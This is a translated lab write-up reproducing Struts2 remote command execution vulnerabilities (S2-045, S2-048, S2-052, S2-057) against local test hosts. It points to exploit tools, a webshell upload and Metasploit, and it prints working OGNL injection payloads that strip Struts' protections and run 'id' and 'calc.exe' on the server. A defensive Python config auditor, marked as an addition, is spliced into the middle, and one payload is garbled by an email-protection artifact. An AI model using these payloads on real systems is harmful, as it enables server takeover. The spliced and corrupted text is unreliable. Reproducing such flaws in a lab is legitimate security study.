Remote Command Execution and Deserialization——Recovery of Struts Framework Command Execution Vulnerability

Reproduction of command execution vulnerabilities across the Struts framework series

(Default port: 8080)

Historical vulnerabilities:

https://www.seebug.org/search/?keywords=struts2
Early comprehensive Struts2 exploitation tool (covers the high-risk vulnerabilities from 2010 to 2017)
K8 struts2 EXP
Fill in the target URL and the tool can execute commands and upload files (a small webshell), then connect to that webshell.
If URLs end in .action or .do, the site may be using the Struts2 framework.

S2-045 vulnerability reproduction (K8 is enough)

http://192.168.0.127:8080/struts2-showcase/showcase.action

S2-048 attack process reproduction

Struts2 S2-048 remote code execution vulnerability exp
C:> struts048.py http://192.168.32.95:8080/struts2-showcase/integration/saveGangster.action
struts048.py
Targets Struts 2.3.x: untrusted input (here "ipconfig") is constructed in the showcase plugin to achieve remote command execution.

S2-052 attack process reproduction (for Struts versions 2.5 to 2.5.12)

Meterpreter session via the Struts S2-052 (CVE-2017-9805) exploit
https://www.cnblogs.com/Hi-blog/p/7510987.html
In Metasploit: search struts2

S2-057 vulnerability reproduction (requires the parameter alwaysSelectFullNamespace to be set to true)

Apache Struts2 namespace remote command execution, CVE-2018-11776 (S2-057) vulnerability reproduction
http://192.168.0.127:8080/struts2-showcase//actionChain1.action

Reference article: https://blog.csdn.net/weixin_43625577/article/details/97111575
https://www.sinesafe.com/article/20180823/struts2057.html

Note:
First, add <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" /> to the struts.xml configuration file.
Second, modify the configuration file struts-actionchaining.xml: delete the namespace attribute, or use the wildcard *.
Finally, change type="chain" to type="redirectAction" (a redirect) so that the path becomes controllable.
Attack payload:
http://192.168.0.127:8080/struts2-showcase/${(1+1)}/actionChain1.action
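The three configuration conditions in the Note above are exactly what a defender should look for when auditing a deployment. The following is an added example, not code from the original post or from the Struts project: it parses a Struts configuration and flags the S2-057 preconditions (alwaysSelectFullNamespace enabled, a package without a fixed namespace, and a chain/redirectAction result without an explicit namespace param). The XML samples are constructed for this example, and the result-param check assumes the common mitigation of pinning the result namespace explicitly.

```python
import xml.etree.ElementTree as ET

# Constructed sample mirroring the lab setup above: the constant is enabled,
# the chaining package has no namespace, and the result is a redirectAction.
VULNERABLE_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />
  <package name="actionchaining" extends="struts-default">
    <action name="actionChain1" class="ActionChain1">
      <result type="redirectAction">actionChain2</result>
    </action>
  </package>
</struts>"""

# Same configuration with the constant left at its default of false and the
# package pinned to a fixed namespace (constructed hardened variant).
HARDENED_XML = VULNERABLE_XML.replace('value="true"', 'value="false"').replace(
    'name="actionchaining"', 'name="actionchaining" namespace="/actionchaining"')

RISKY_RESULT_TYPES = {"chain", "redirectAction"}

def always_select_full_namespace(root):
    for c in root.iter("constant"):
        if c.get("name") == "struts.mapper.alwaysSelectFullNamespace":
            return c.get("value", "").strip().lower() == "true"
    return False  # Struts default when the constant is absent

def find_risky_results(root):
    """(package, action, type) for chain/redirectAction results whose namespace would
    be taken from the request: package namespace absent/wildcarded, no namespace param."""
    findings = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns and "*" not in ns:
            continue  # fixed namespace, request path cannot influence it
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                rtype = result.get("type", "dispatcher")
                params = {p.get("name") for p in result.findall("param")}
                if rtype in RISKY_RESULT_TYPES and "namespace" not in params:
                    findings.append((pkg.get("name"), action.get("name"), rtype))
    return findings

def audit(xml_text):
    root = ET.fromstring(xml_text)
    flag = always_select_full_namespace(root)
    risky = find_risky_results(root)
    return {"alwaysSelectFullNamespace": flag, "risky_results": risky,
            "exposed": flag and bool(risky)}
```

Run audit() over each struts*.xml in a deployment; "exposed" is True only when both the mapper constant and an unbounded chain/redirectAction result are present.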

$ {#_ memberAccess = @ ognl.OgnlContext @ DEFAULT_MEMBER_ACCESS, @ java.lang.Runtime @ getRuntime (). exec ('calc.exe')} (execute the calculator of the remote server)

${
(#[email protected]@DEFAULT_MEMBER_ACCESS).(#ct=#request[‘struts.valueStack’].context).(#cr=#ct[‘com.opensymphony.xwork2.ActionContext.container’]).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#[email protected]@getRuntime().exec(‘id’)).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

Origin blog.csdn.net/weixin_43079958/article/details/105500489